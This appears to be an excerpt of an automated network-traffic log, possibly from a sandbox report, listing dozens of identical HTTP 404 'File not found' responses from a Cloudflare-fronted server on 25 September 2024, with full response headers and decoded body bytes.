            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6WitqmhZ8B%2BGSEZW3acKw2YebenkInm4A6l%2FRw1r1v3ORGXgrxFQOowlwRftVc2h3lh6nIxgaloZKn5H40s7iumQlbRlQ3GeR80kzTmDA7BsYDFVch%2BmoSXNqfFvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997a858224233-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WChi1QIXX61JfiULSjt%2Bq3ACHNz9ME3BMx3yyDRgRFzOxjiBToLkuYk%2FiZ1sadCZYt2DoxqEMvmbRtSmC5AAQ4AFxlrEIBr2fwH4ZmP8gS07MLEd24e23kTM1socAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997adcbb64249-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlsQnQO8WvCZphPefhKVGmPnEqyp72RBVLH8v9697SDb%2BBImQb64F2QxLdIZR7q%2BqFY5zRiuOA5Tz1UsyxB80IF84GImJUmvb0vfBrYq4sBvKgzGyJY5sioLyGcbKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997b2f83b42ce-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BhNEt4n1rZLkJ5EAQ3gmHLJpt%2FxMUbwZEQ7pqSkHjgBeoFR5S8JhlswTUqbDtqVBbVM5GW3jtH81ZW9P1elEEqFwNowcoZePh3DcAtzQ5d6cxJ9liRIK99jcJHR6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997b809f28c3c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxzI6dJOPblceUM0Sw9csJrys%2FR7CZbli8EHLwvK3x%2BeM9wr2EKrj2pLznelU7Jinf6wsMQyVYKy8S2GvgAC7TpMPJj6VkcMvc%2B08weUXzjQf8Ph5xirH9WnboBpDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997bd6d574405-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeVZ0oj4nYJ8MLBHrQG8htA1ikp6XmZPNSYl1wAib9tpWKaxrLh6zlmnNRcs9o8X1Z3FdygztPbc%2F5iCoXc5GsviFIU3vz5wPfLI8GfcU1JjRZ9zxXJo%2FGFCPoMbxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997c2dd7042cf-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIAL0HIKAWve80VQ3bHdUWWkmCfFm5nbWLedkWKLzxv9S8JP7GNSDdyhUFczQ7i6MMBgw1ZzKMev0R75CJTCLYUWCLi6DLkC8RTg84TwCfXMT2ibYaIbPXuWVT%2Fhig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997c7ebc7c344-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=165xciF3CIJeGmb2pMxMrN4FuyFtk6oyTO%2FF%2FKdOw4eY9yUaJSFCm%2Bbv1fQU8FO3LVnwRen%2Fk045rTdCu1eetQvBlaZiNJcuUyEUIweHCfUaKtTTBKVWr3na5CuKsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997cdfe5c43a5-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O32TioDNtasVS2zWW8vsQkjS1Q7k6Zx8rZPaPbR%2FBLMpNZ%2Bz5%2FspvnkcIR5R7eIN4XBD%2FNN2h00wdckMkryOlB51OS6PCgC6cgQ758wUDzxEGSzs%2BoY2pG%2Fk49y7TQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997d3094743b9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbcYUiQrMXMEMZxI6XpM3JESCeQKRpvjmquP9K3BSFaROxnKWUcmcIzcBBKb7F6Mlv2T2d2EKHsK74KGue09hY%2BCBnBTqQkoVJ9nDDrMCNgTmQS%2BLYh%2BrlRKTOod6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997d879760cc8-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qk4FnnBREqj3QBzsmkJkbsdGi9Aw0HEt%2BYBpdA0bPMY%2BVkJL5mAawI6dyUyl3oSE%2BcmIsIiA6vUgej2oMfPzAYEldfmoMYcEnlL0iIlImzRrYCdJc%2B4Tf7R6B5Cmnw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997ddeb31432c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mqchNe6mBEI8bNJjwbOFcHJzqv2%2BzSHsgUG52AUzOx%2BXnsSfluMUZEhDHrN0kF5MrncuYXknYahfY33xLEwcJCUPe%2BjZErolxFcaf1YAcoh87yIXElzTkNuegYj91A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997e979f042cb-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4Ib1Dyum34c2aj96wDdanhsrbSA%2FkLg8opE9Hkgy6JodCThkqucV59Vug0Nu6dzuzJkHf5tF2hAGPT6yUQyucz2KUTPGKYYLvlXGc3rlypLZ41QkYaGFv3x%2FDUePA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997ef3b0443bb-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okb9Udb8ZV8JDRyozIa0EcLB0Yn%2BvpOrrVT1kMOJNqPRSCJ2sbpvVqYAQSLC76DAsDQYQBAZBew17PFT4jf8AkS4xTbq0AeEp2OL5SxgcfszIIA6lQ5lclgYnE6%2FPQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997f43ef94228-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spSKVEFIiqjwgjhlj70ZZwOYdXgnmVIBOTQAVQ1j1eNsAWQgTVnygcvp5f%2FcB1eYCpn6gui6fX8GcMtH2RA0oEIfy6jKh80Rw2zsPCjijMFGzKpccPrIDV%2FYRKIhCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997f96949728d-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKdsOSoHwa8XDlSJhQ8HUD5v4heoErtpumv3kWTUdrHhrzq7VvI54z4ONpt%2BlsJhYqiFPAZzY0ERY5fkU7j9BLBwvgekdvW4MKVI9dyktT4mu4ALluoV1fp4V7nf2A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8997fe7afc4307-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5kJPnghWlPqYN%2FG2sLIwFQQ9j%2FXaOtzWjkxcyecEN1LUPpGwmlwNQqILmjw0DeLGrzI5WtJmrPAgzQwrXwB5UNAyhvLDhuKGX129KDJsrWtpmC%2BGJ2yQS8D0D65hQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998037c5e42be-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FzpQ2TxHBX58U%2F2j9wHbFXPIkhFElAYGDoYbB76Mdhdf5slrxCdRoOzq0GX%2Fckb60%2BkLJRJq%2Fogx8QOrGkn77BOKM2QxGEYTjVwD%2BtgSyeTN%2B3P2FBGugGsyPjd%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998086b5242b7-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exIDN%2Bc1juZkq2l7SHWeE4dFsMPWY7dlOHEmbgkL5eZVO3uUkiD4%2BmtGj0XU8jekp56a57pcWcCbNyb8jPCwDemy5iqYrouoio9c52N%2FRI4zCPk7MRm1AB6%2BaQFiCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89980d7cbe4235-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qf9BVwq9lJP1p3l5cxisQr0x097hzsKEpAs3658NUVwHv3c3qHFminK2VK10V4ljr0Ye1pk2KCZqwu9etZVhuBHhAmuvuY403foqBGNUVc4Xn4pNpSHGr7mN3lf2GQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899812cef243cf-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MD1XFttmi9rrwNMjXikA2KqqdgxQtUYC17QyVOMs7N%2FwpyIbt%2BIwlzmwlr7bli14QCiVobOhewEmFuhWK2RhGNL7DkNaagMQUB43k1VfJJoBXTRC04KchtRSgeIWRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899817ed5043a3-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HPwad%2FrGWuUKgQ7nIaCZyyDp9MNTaFXBtxdaNp%2BCOfeURqHaLrj5g3yx4V5l7Og4wrhmfxNiOt%2B1Z2kyfoQKHpy554Xeo6CCjUuKvdef22DfYf70h6Bovm1p8dp1aA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89981d29dc43dd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7FX%2FObk%2FJqP%2FGnkHcs7if9jUtHdliW50%2F6VF7%2FTIuan68OIFUxSklFkWOQaJKiSy4gF88WPrkslEnNd8vkEyImbAqhacqO2Co%2BjNnFob3a0qbeaplWJ5XcLV7f7MVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89982298bb43f8-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiImsrHdkqH7lfdKOXiVROhA4DdeNq%2BaghxFPvVAvXbUwiw4Gz7nBNzY9d0hjS7l9dRIinmV4hVrqZLbcjbyp0aBRVOLKjZQ5BImQWqf8oE7KkAsmZlH0E%2FUKWbEag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899827af6541f9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYj01uITRSD0kXCg0qORYhZUr%2FPgrGDAZBROqs1QbvbUI1yGWE0JudnGXd208KbIuANKKWeza0uoKOhdCW904KOfiTCH9wKL8G0%2BBJBej2FfuYvfgEOYpklFQr3fbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89982e3cfe4283-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YnnDjkLacFGrsKn7CParT3zYaWHJolXgX6XqSXTfaui%2BE%2FtRBaVNxWsJ4%2BfIQfs2nxU7%2BgfeFBi9tR5y0iIKt%2Bjea3KZPv5WEAoBKjc7sCYqCWhgvA17H6cWmTThmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998333f1443a4-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OJW0hvjKcJLkr2O9EjcYUHZI2v7p51pMOXf35ES42G%2Bhk90j7pXrl5AyLLmIJTESJtIJEtenziTdGtqQh2wlnEBPxl2qBI6SZzqiMpEDAbIXVw19JjK2jxkHpCGhzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998385f7b0f9d-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RKk9X7He4imPTn9N4bCbuqMOLMsRD5dFtRnEVnu8JTnHW2qPLruowa9him52BA0i%2FW87eZ2xDovDt5k9XjEcysGh%2BGZxQvaLAPotvRqflcXZnwNHL%2B3cx0l5xuqflQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89983d68468c4b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5bJIy3o9EhTXFjlzaRbPcoTpBajJhh0r9SDFtIv4v%2F%2B%2BWMTjRKwDvjw2pngIouEiHhydWzhdAaZRFZh61TTaNeHArJrVU6YenuZVdseHzr1RhshSk4kZj%2Boe8vpXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998428da68c8f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBbOvRKKYajNu%2FN9N7BR6q%2F6f9jK4wDk8%2FiSAmUoewl%2FATF%2F1SYe2Egm69UCFaAB298E5dxMeFzofVeB%2FZjiddvHoGwfFKMzjxqaJYey%2BHL8B5odJGQpLOknJpIrDg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899847da75c41d-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M06G91N2FVGMNROUj21ArajTcdWS1xC%2BV%2BvOYeJGfUp6%2BnMv%2FaWy8MdTzuzj83k97MXL4V9VjfLTeJ55dFOpenvETXhbctNzIroAa22vj4loWR6QCVWqpN1oNobqaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89984e0efb727b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3GC%2BTQ%2BuR8ct712CfZymo%2FJa%2Bm4%2FNSLfkjirkP%2B%2B768IDnF%2FCac9iPL1koSGwoyGX%2F3dt3wiPr1lS908Xjep8%2B0sqtU6ZR%2F6LZugilaBo7uMf%2F%2FT9dbSlNE9gmTmg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998534df68cc6-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMj4GF8CWWp5Z04O3h6mZjPvasKM0tD0AMO9rC%2FVrGzOjYUyF61nJ%2B2TO5v1y%2BCHbY%2FoRy6MGMiZHlTZG0eWcFcHnE1TRGhHzUndrTovL3jfiFUy1cEQZIRu%2BWKOkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998586aa64378-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
